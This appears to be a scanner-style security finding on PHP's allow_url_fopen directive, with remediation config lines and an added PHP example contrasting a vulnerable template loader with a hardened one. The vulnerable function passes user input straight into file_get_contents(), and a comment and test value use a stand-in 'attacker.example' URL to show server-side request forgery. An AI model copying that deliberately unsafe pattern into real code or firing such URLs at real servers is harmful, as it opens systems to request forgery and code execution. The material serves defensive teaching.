PHP allow_url_fopen enabled

Description
  • The PHP configuration directive allow_url_fopen is enabled. When enabled, the URL-aware fopen wrappers let file functions such as fopen(), file_get_contents() and file() read from remote locations (HTTP or FTP servers) as well as from local files. Historically, a large number of remote file inclusion and code injection vulnerabilities reported in PHP-based web applications were caused by the combination of this setting and bad input filtering: user-controlled data reached a file function or an include/require statement, and the server fetched and processed an attacker-chosen URL. Since PHP 5.2.0, include and require of URLs are governed by the separate directive allow_url_include (off by default), so on current releases the main risk of allow_url_fopen is server-side request forgery and data retrieval through fopen-family functions that receive unfiltered user input. allow_url_fopen is enabled by default.
Remediation
  • Since PHP 4.3.4 allow_url_fopen is a PHP_INI_SYSTEM directive: disable it in php.ini, in the Apache server or virtual-host configuration (php_admin_flag), or in the PHP-FPM pool configuration. Setting it from .htaccess with php_flag only works on PHP releases older than 4.3.4; on later releases the directive there has no effect, and ini_set() cannot change it at runtime. After changing it, restart the web server or PHP-FPM and confirm the effective value with phpinfo() or php -i, because the CLI may read a different php.ini than the web SAPI.

    php.ini
    allow_url_fopen = Off

    httpd.conf (Apache mod_php, server or virtual-host context)
    php_admin_flag allow_url_fopen Off

    PHP-FPM pool configuration
    php_admin_flag[allow_url_fopen] = off

    .htaccess (PHP releases older than 4.3.4 only)
    php_flag allow_url_fopen off
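The following PHP script is an added example, not text or code from the original finding, from PHP itself or from any scanner product. It illustrates both sections above: a handler that passes a request parameter straight into file_get_contents() (the pattern the Description warns about), the same handler hardened so that user input can no longer select a URL wrapper, and a runtime check of the effective setting that also shows why the Remediation must happen in the server configuration rather than in application code. The function names, the allowlist, the templates directory and the request value are illustrative assumptions.

```php
<?php
declare(strict_types=1);

// Added example; function names, the 'tpl' parameter, the allowlist and the
// base directory are assumptions chosen for illustration.

// Vulnerable: user input flows straight into a URL-aware file function.
// With allow_url_fopen=On, ?tpl=http://attacker.example/payload makes the
// server fetch an attacker-chosen URL (SSRF, internal-service or metadata
// access); if the result is then eval()'d or included it becomes code execution.
function loadTemplateVulnerable(string $name)
{
    return file_get_contents($name);
}

// Hardened: the user value only selects an entry from a fixed allowlist and is
// never used as a path or URL itself; the resulting path is additionally
// checked to be a local stream before it is opened.
function loadTemplateHardened(string $name, string $baseDir): string
{
    $allowed = ['home', 'about', 'contact'];
    if (!in_array($name, $allowed, true)) {
        throw new InvalidArgumentException('unknown template');
    }
    $path = $baseDir . DIRECTORY_SEPARATOR . $name . '.tpl';
    // Refuses http://, ftp://, php://, data: and other non-local wrappers
    // even if the allowlist is later edited to contain one by mistake.
    if (!stream_is_local($path)) {
        throw new RuntimeException('non-local stream refused: ' . $path);
    }
    $data = file_get_contents($path);
    if ($data === false) {
        throw new RuntimeException('template not readable: ' . $path);
    }
    return $data;
}

// Verification: allow_url_fopen has been PHP_INI_SYSTEM since 4.3.4, so it can
// be read at runtime but not changed. ini_set() returning false is the expected
// outcome and shows why the fix belongs in php.ini, httpd.conf or the FPM pool.
function allowUrlFopenStatus(): array
{
    return [
        'enabled'          => filter_var(ini_get('allow_url_fopen'), FILTER_VALIDATE_BOOLEAN),
        'runtime_override' => ini_set('allow_url_fopen', '0') !== false,
    ];
}

$status = allowUrlFopenStatus();
printf("allow_url_fopen enabled: %s, changeable with ini_set(): %s\n",
    $status['enabled'] ? 'yes' : 'no',
    $status['runtime_override'] ? 'yes' : 'no');

// Constructed request value standing in for $_GET['tpl'].
$tpl = 'http://attacker.example/payload';
try {
    loadTemplateHardened($tpl, __DIR__ . '/templates');
} catch (InvalidArgumentException $e) {
    echo 'hardened handler rejected input: ', $e->getMessage(), "\n";
}
```

Run it with the same SAPI the application uses (for example through the web server rather than the CLI), since that is the configuration whose allow_url_fopen value matters; "changeable with ini_set(): no" is the normal result and confirms that the directive can only be fixed at the php.ini, httpd.conf or FPM-pool level.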
References